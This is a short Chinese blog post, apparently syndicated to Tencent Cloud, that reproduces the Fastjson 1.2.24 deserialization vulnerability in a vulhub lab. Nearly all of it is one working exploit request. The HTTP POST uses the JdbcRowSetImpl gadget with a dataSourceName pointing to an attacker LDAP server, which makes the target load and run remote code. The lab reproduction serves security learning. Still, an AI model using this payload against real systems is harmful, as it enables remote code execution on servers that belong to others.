Fastjson-1.2.24漏洞复现

sugarbeet

发布于 2022-09-26 19:20:44

2490

发布于 2022-09-26 19:20:44

文章被收录于专栏：小满的技术录小满的技术录

Fastjson-1.2.24漏洞复现

水一篇文章，昨天做了1.2.47的忘记了一个低版本的今天补上

配置所有我都没有变，同样使用的是vulhub来启动Fastjson环境

知识最后的Payload有所不同

Payload，访问Fastjson环境，然后替换包内容

POST / HTTP/1.1
Host: 104.128.92.144:8090
Content-Type: application/json
Content-Length: 172

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://104.128.92.144:7777/Exploit",
        "autoCommit":true
    }
}

Q.E.D.

本文参与腾讯云自媒体同步曝光计划，分享自作者个人站点/博客。

原始发表：2021-12-18，如有侵权请联系 cloudcommunity@tencent.com 删除

fastjson